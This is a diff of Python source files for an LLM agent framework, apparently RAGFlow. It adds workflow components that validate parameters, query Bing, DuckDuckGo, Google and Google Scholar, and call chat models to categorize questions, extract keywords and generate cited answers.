@staticmethod
def check_valid_value(param, descr, valid_values):
if param not in valid_values:
raise ValueError(
descr
+ " {} is not supported, it should be in {}".format(param, valid_values)
)
@staticmethod
def check_defined_type(param, descr, types):
if type(param).__name__ not in types:
raise ValueError(
descr + " {} not supported, should be one of {}".format(param, types)
)
@staticmethod
def check_and_change_lower(param, valid_list, descr=""):
if type(param).__name__ != "str":
raise ValueError(
descr
+ " {} not supported, should be one of {}".format(param, valid_list)
)
lower_param = param.lower()
if lower_param in valid_list:
return lower_param
else:
raise ValueError(
descr
+ " {} not supported, should be one of {}".format(param, valid_list)
)
@staticmethod
def _greater_equal_than(value, limit):
return value >= limit - settings.FLOAT_ZERO
@staticmethod
def _less_equal_than(value, limit):
return value <= limit + settings.FLOAT_ZERO
@staticmethod
def _range(value, ranges):
in_range = False
for left_limit, right_limit in ranges:
if (
left_limit - settings.FLOAT_ZERO
<= value
<= right_limit + settings.FLOAT_ZERO
):
in_range = True
break
return in_range
@staticmethod
def _in(value, right_value_list):
return value in right_value_list
@staticmethod
def _not_in(value, wrong_value_list):
return value not in wrong_value_list
def _warn_deprecated_param(self, param_name, descr):
if self._deprecated_params_set.get(param_name):
flow_logger.warning(
f"{descr} {param_name} is deprecated and ignored in this version."
)
def _warn_to_deprecate_param(self, param_name, descr, new_param):
if self._deprecated_params_set.get(param_name):
flow_logger.warning(
f"{descr} {param_name} will be deprecated in future release; "
f"please use {new_param} instead."
)
return True
return False
class ComponentBase(ABC):
component_name: str
def __str__(self):
"""
{
"component_name": "Begin",
"params": {}
}
"""
return """{{
"component_name": "{}",
"params": {}
}}""".format(self.component_name,
self._param
)
def __init__(self, canvas, id, param: ComponentParamBase):
self._canvas = canvas
self._id = id
self._param = param
self._param.check()
def run(self, history, **kwargs):
flow_logger.info("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
json.dumps(kwargs, ensure_ascii=False)))
try:
res = self._run(history, **kwargs)
self.set_output(res)
except Exception as e:
self.set_output(pd.DataFrame([{"content": str(e)}]))
raise e
return res
def _run(self, history, **kwargs):
raise NotImplementedError()
def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
o = getattr(self._param, self._param.output_var_name)
if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
if not isinstance(o, list): o = [o]
o = pd.DataFrame(o)
if allow_partial or not isinstance(o, partial):
if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
return pd.DataFrame(o if isinstance(o, list) else [o])
return self._param.output_var_name, o
outs = None
for oo in o():
if not isinstance(oo, pd.DataFrame):
outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
else: outs = oo
return self._param.output_var_name, outs
def reset(self):
setattr(self._param, self._param.output_var_name, None)
def set_output(self, v: pd.DataFrame):
setattr(self._param, self._param.output_var_name, v)
def get_input(self):
upstream_outs = []
reversed_cpnts = []
if len(self._canvas.path) > 1:
reversed_cpnts.extend(self._canvas.path[-2])
reversed_cpnts.extend(self._canvas.path[-1])
if DEBUG: print(self.component_name, reversed_cpnts[::-1])
for u in reversed_cpnts[::-1]:
if self.get_component_name(u) in ["switch"]: continue
if self.component_name.lower() == "generate" and self.get_component_name(u) == "retrieval":
o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
if o is not None:
upstream_outs.append(o)
continue
if u not in self._canvas.get_component(self._id)["upstream"]: continue
if self.component_name.lower().find("switch") < 0 \
and self.get_component_name(u) in ["relevant", "categorize"]:
continue
if u.lower().find("answer") >= 0:
for r, c in self._canvas.history[::-1]:
if r == "user":
upstream_outs.append(pd.DataFrame([{"content": c}]))
break
break
if self.component_name.lower().find("answer") >= 0:
if self.get_component_name(u) in ["relevant"]:
continue
else:
o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
if o is not None:
upstream_outs.append(o)
break
if upstream_outs:
df = pd.concat(upstream_outs, ignore_index=True)
if "content" in df:
df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
return df
return pd.DataFrame()
def get_stream_input(self):
reversed_cpnts = []
if len(self._canvas.path) > 1:
reversed_cpnts.extend(self._canvas.path[-2])
reversed_cpnts.extend(self._canvas.path[-1])
for u in reversed_cpnts[::-1]:
if self.get_component_name(u) in ["switch", "answer"]: continue
return self._canvas.get_component(u)["obj"].output()[1]
@staticmethod
def be_output(v):
return pd.DataFrame([{"content": v}])
def get_component_name(self, cpn_id):
return self._canvas.get_component(cpn_id)["obj"].component_name.lower()

48
agent/component/begin.py Normal file
View File

@ -0,0 +1,48 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from functools import partial
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase
class BeginParam(ComponentParamBase):
"""
Define the Begin component parameters.
"""
def __init__(self):
super().__init__()
self.prologue = "Hi! I'm your smart assistant. What can I do for you?"
def check(self):
return True
class Begin(ComponentBase):
component_name = "Begin"
def _run(self, history, **kwargs):
if kwargs.get("stream"):
return partial(self.stream_output)
return pd.DataFrame([{"content": self._param.prologue}])
def stream_output(self):
res = {"content": self._param.prologue}
yield res
self.set_output(res)

85
agent/component/bing.py Normal file
View File

@ -0,0 +1,85 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import requests
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class BingParam(ComponentParamBase):
"""
Define the Bing component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 10
self.channel = "Webpages"
self.api_key = "YOUR_ACCESS_KEY"
self.country = "CN"
self.language = "en"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_valid_value(self.channel, "Bing Web Search or Bing News", ["Webpages", "News"])
self.check_empty(self.api_key, "Bing subscription key")
self.check_valid_value(self.country, "Bing Country",
['AR', 'AU', 'AT', 'BE', 'BR', 'CA', 'CL', 'DK', 'FI', 'FR', 'DE', 'HK', 'IN', 'ID',
'IT', 'JP', 'KR', 'MY', 'MX', 'NL', 'NZ', 'NO', 'CN', 'PL', 'PT', 'PH', 'RU', 'SA',
'ZA', 'ES', 'SE', 'CH', 'TW', 'TR', 'GB', 'US'])
self.check_valid_value(self.language, "Bing Languages",
['ar', 'eu', 'bn', 'bg', 'ca', 'ns', 'nt', 'hr', 'cs', 'da', 'nl', 'en', 'gb', 'et',
'fi', 'fr', 'gl', 'de', 'gu', 'he', 'hi', 'hu', 'is', 'it', 'jp', 'kn', 'ko', 'lv',
'lt', 'ms', 'ml', 'mr', 'nb', 'pl', 'br', 'pt', 'pa', 'ro', 'ru', 'sr', 'sk', 'sl',
'es', 'sv', 'ta', 'te', 'th', 'tr', 'uk', 'vi'])
class Bing(ComponentBase, ABC):
component_name = "Bing"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Bing.be_output("")
try:
headers = {"Ocp-Apim-Subscription-Key": self._param.api_key, 'Accept-Language': self._param.language}
params = {"q": ans, "textDecorations": True, "textFormat": "HTML", "cc": self._param.country,
"answerCount": 1, "promote": self._param.channel}
if self._param.channel == "Webpages":
response = requests.get("https://api.bing.microsoft.com/v7.0/search", headers=headers, params=params)
response.raise_for_status()
search_results = response.json()
bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["snippet"]} for i in
search_results["webPages"]["value"]]
elif self._param.channel == "News":
response = requests.get("https://api.bing.microsoft.com/v7.0/news/search", headers=headers,
params=params)
response.raise_for_status()
search_results = response.json()
bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["description"]} for i
in search_results['news']['value']]
except Exception as e:
return Bing.be_output("**ERROR**: " + str(e))
if not bing_res:
return Bing.be_output("")
df = pd.DataFrame(bing_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

View File

@ -0,0 +1,87 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from agent.settings import DEBUG
class CategorizeParam(GenerateParam):
"""
Define the Categorize component parameters.
"""
def __init__(self):
super().__init__()
self.category_description = {}
self.prompt = ""
def check(self):
super().check()
self.check_empty(self.category_description, "[Categorize] Category examples")
for k, v in self.category_description.items():
if not k: raise ValueError(f"[Categorize] Category name can not be empty!")
if not v.get("to"): raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")
def get_prompt(self):
cate_lines = []
for c, desc in self.category_description.items():
for l in desc.get("examples", "").split("\n"):
if not l: continue
cate_lines.append("Question: {}\tCategory: {}".format(l, c))
descriptions = []
for c, desc in self.category_description.items():
if desc.get("description"):
descriptions.append(
"--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))
self.prompt = """
You're a text classifier. You need to categorize the users questions into {} categories,
namely: {}
Here's description of each category:
{}
You could learn from the following examples:
{}
You could learn from the above examples.
Just mention the category names, no need for any additional words.
""".format(
len(self.category_description.keys()),
"/".join(list(self.category_description.keys())),
"\n".join(descriptions),
"- ".join(cate_lines)
)
return self.prompt
class Categorize(Generate, ABC):
component_name = "Categorize"
def _run(self, history, **kwargs):
input = self.get_input()
input = "Question: " + ("; ".join(input["content"]) if "content" in input else "") + "Category: "
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": input}],
self._param.gen_conf())
if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::", input)
for c in self._param.category_description.keys():
if ans.lower().find(c.lower()) >= 0:
return Categorize.be_output(self._param.category_description[c]["to"])
return Categorize.be_output(self._param.category_description.items()[-1][1]["to"])

75
agent/component/cite.py Normal file
View File

@ -0,0 +1,75 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase
class CiteParam(ComponentParamBase):
"""
Define the Retrieval component parameters.
"""
def __init__(self):
super().__init__()
self.cite_sources = []
def check(self):
self.check_empty(self.cite_source, "Please specify where you want to cite from.")
class Cite(ComponentBase, ABC):
component_name = "Cite"
def _run(self, history, **kwargs):
input = "\n- ".join(self.get_input()["content"])
sources = [self._canvas.get_component(cpn_id).output()[1] for cpn_id in self._param.cite_source]
query = []
for role, cnt in history[::-1][:self._param.message_history_window_size]:
if role != "user":continue
query.append(cnt)
query = "\n".join(query)
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
if not kbs:
raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
embd_nms = list(set([kb.embd_id for kb in kbs]))
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
embd_mdl = LLMBundle(kbs[0].tenant_id, LLMType.EMBEDDING, embd_nms[0])
rerank_mdl = None
if self._param.rerank_id:
rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
1, self._param.top_n,
self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
aggs=False, rerank_mdl=rerank_mdl)
if not kbinfos["chunks"]: return pd.DataFrame()
df = pd.DataFrame(kbinfos["chunks"])
df["content"] = df["content_with_weight"]
del df["content_with_weight"]
return df

View File

@ -0,0 +1,66 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from duckduckgo_search import DDGS
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class DuckDuckGoParam(ComponentParamBase):
"""
Define the DuckDuckGo component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 10
self.channel = "text"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])
class DuckDuckGo(ComponentBase, ABC):
component_name = "DuckDuckGo"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return DuckDuckGo.be_output("")
try:
if self._param.channel == "text":
with DDGS() as ddgs:
# {'title': '', 'href': '', 'body': ''}
duck_res = [{"content": '<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"]} for i
in ddgs.text(ans, max_results=self._param.top_n)]
elif self._param.channel == "news":
with DDGS() as ddgs:
# {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
duck_res = [{"content": '<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"]} for i
in ddgs.news(ans, max_results=self._param.top_n)]
except Exception as e:
return DuckDuckGo.be_output("**ERROR**: " + str(e))
if not duck_res:
return DuckDuckGo.be_output("")
df = pd.DataFrame(duck_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

150
agent/component/generate.py Normal file
View File

@ -0,0 +1,150 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
from functools import partial
import pandas as pd
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase
class GenerateParam(ComponentParamBase):
"""
Define the Generate component parameters.
"""
def __init__(self):
super().__init__()
self.llm_id = ""
self.prompt = ""
self.max_tokens = 0
self.temperature = 0
self.top_p = 0
self.presence_penalty = 0
self.frequency_penalty = 0
self.cite = True
self.parameters = []
def check(self):
self.check_decimal_float(self.temperature, "[Generate] Temperature")
self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
self.check_decimal_float(self.top_p, "[Generate] Top P")
self.check_empty(self.llm_id, "[Generate] LLM")
# self.check_defined_type(self.parameters, "Parameters", ["list"])
def gen_conf(self):
conf = {}
if self.max_tokens > 0: conf["max_tokens"] = self.max_tokens
if self.temperature > 0: conf["temperature"] = self.temperature
if self.top_p > 0: conf["top_p"] = self.top_p
if self.presence_penalty > 0: conf["presence_penalty"] = self.presence_penalty
if self.frequency_penalty > 0: conf["frequency_penalty"] = self.frequency_penalty
return conf
class Generate(ComponentBase):
component_name = "Generate"
def get_dependent_components(self):
cpnts = [para["component_id"] for para in self._param.parameters]
return cpnts
def set_cite(self, retrieval_res, answer):
answer, idx = retrievaler.insert_citations(answer, [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
[ck["vector"] for _, ck in retrieval_res.iterrows()],
LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
self._canvas.get_embedding_model()), tkweight=0.7,
vtweight=0.3)
doc_ids = set([])
recall_docs = []
for i in idx:
did = retrieval_res.loc[int(i), "doc_id"]
if did in doc_ids: continue
doc_ids.add(did)
recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})
del retrieval_res["vector"]
del retrieval_res["content_ltks"]
reference = {
"chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
"doc_aggs": recall_docs
}
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
res = {"content": answer, "reference": reference}
return res
def _run(self, history, **kwargs):
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
prompt = self._param.prompt
retrieval_res = self.get_input()
input = (" - " + "\n - ".join(retrieval_res["content"])) if "content" in retrieval_res else ""
for para in self._param.parameters:
cpn = self._canvas.get_component(para["component_id"])["obj"]
_, out = cpn.output(allow_partial=False)
if "content" not in out.columns:
kwargs[para["key"]] = "Nothing"
else:
kwargs[para["key"]] = " - " + "\n - ".join(out["content"])
kwargs["input"] = input
for n, v in kwargs.items():
# prompt = re.sub(r"\{%s\}"%n, re.escape(str(v)), prompt)
prompt = re.sub(r"\{%s\}" % n, str(v), prompt)
downstreams = self._canvas.get_component(self._id)["downstream"]
if kwargs.get("stream") and len(downstreams) == 1 and self._canvas.get_component(downstreams[0])[
"obj"].component_name.lower() == "answer":
return partial(self.stream_output, chat_mdl, prompt, retrieval_res)
if "empty_response" in retrieval_res.columns:
return Generate.be_output(input)
ans = chat_mdl.chat(prompt, self._canvas.get_history(self._param.message_history_window_size),
self._param.gen_conf())
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
df = self.set_cite(retrieval_res, ans)
return pd.DataFrame(df)
return Generate.be_output(ans)
def stream_output(self, chat_mdl, prompt, retrieval_res):
res = None
if "empty_response" in retrieval_res.columns and "\n- ".join(retrieval_res["content"]):
res = {"content": "\n- ".join(retrieval_res["content"]), "reference": []}
yield res
self.set_output(res)
return
answer = ""
for ans in chat_mdl.chat_streamly(prompt, self._canvas.get_history(self._param.message_history_window_size),
self._param.gen_conf()):
res = {"content": ans, "reference": []}
answer = ans
yield res
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
res = self.set_cite(retrieval_res, answer)
yield res
self.set_output(res)

96
agent/component/google.py Normal file
View File

@ -0,0 +1,96 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from serpapi import GoogleSearch
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class GoogleParam(ComponentParamBase):
"""
Define the Google component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 10
self.api_key = "xxx"
self.country = "cn"
self.language = "en"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_empty(self.api_key, "SerpApi API key")
self.check_valid_value(self.country, "Google Country",
['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
'zm', 'zw'])
self.check_valid_value(self.language, "Google languages",
['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu']
)
class Google(ComponentBase, ABC):
component_name = "Google"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Google.be_output("")
try:
client = GoogleSearch(
{"engine": "google", "q": ans, "api_key": self._param.api_key, "gl": self._param.country,
"hl": self._param.language, "num": self._param.top_n})
google_res = [{"content": '<a href="' + i["link"] + '">' + i["title"] + '</a> ' + i["snippet"]} for i in
client.get_dict()["organic_results"]]
except Exception as e:
return Google.be_output("**ERROR**: Existing Unavailable Parameters!")
if not google_res:
return Google.be_output("")
df = pd.DataFrame(google_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

View File

@ -0,0 +1,70 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
from scholarly import scholarly
class GoogleScholarParam(ComponentParamBase):
"""
Define the GoogleScholar component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 6
self.sort_by = 'relevance'
self.year_low = None
self.year_high = None
self.patents = True
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")
class GoogleScholar(ComponentBase, ABC):
component_name = "GoogleScholar"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return GoogleScholar.be_output("")
scholar_client = scholarly.search_pubs(ans, patents=self._param.patents, year_low=self._param.year_low,
year_high=self._param.year_high, sort_by=self._param.sort_by)
scholar_res = []
for i in range(self._param.top_n):
try:
pub = next(scholar_client)
scholar_res.append({"content": 'Title: ' + pub['bib']['title'] + '\n_Url: <a href="' + pub[
'pub_url'] + '"></a> ' + "\n author: " + ",".join(pub['bib']['author']) + '\n Abstract: ' + pub[
'bib'].get('abstract', 'no abstract')})
except StopIteration or Exception as e:
print("**ERROR** " + str(e))
break
if not scholar_res:
return GoogleScholar.be_output("")
df = pd.DataFrame(scholar_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

View File

@ -0,0 +1,65 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from agent.settings import DEBUG
class KeywordExtractParam(GenerateParam):
"""
Define the KeywordExtract component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 1
def check(self):
super().check()
self.check_positive_integer(self.top_n, "Top N")
def get_prompt(self):
self.prompt = """
- Role: You're a question analyzer.
- Requirements:
- Summarize user's question, and give top %s important keyword/phrase.
- Use comma as a delimiter to separate keywords/phrases.
- Answer format: (in language of user's question)
- keyword:
""" % self.top_n
return self.prompt
class KeywordExtract(Generate, ABC):
component_name = "KeywordExtract"
def _run(self, history, **kwargs):
q = ""
for r, c in self._canvas.history[::-1]:
if r == "user":
q += c
break
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
self._param.gen_conf())
ans = re.sub(r".*keyword:", "", ans).strip()
if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::")
return KeywordExtract.be_output(ans)

View File

@ -0,0 +1,53 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
from agent.component.base import ComponentBase, ComponentParamBase
class MessageParam(ComponentParamBase):
"""
Define the Message component parameters.
"""
def __init__(self):
super().__init__()
self.messages = []
def check(self):
self.check_empty(self.messages, "[Message]")
return True
class Message(ComponentBase, ABC):
component_name = "Message"
def _run(self, history, **kwargs):
if kwargs.get("stream"):
return partial(self.stream_output)
return Message.be_output(random.choice(self._param.messages))
def stream_output(self):
res = None
if self._param.messages:
res = {"content": random.choice(self._param.messages)}
yield res
self.set_output(res)

65
agent/component/pubmed.py Normal file
View File

@ -0,0 +1,65 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
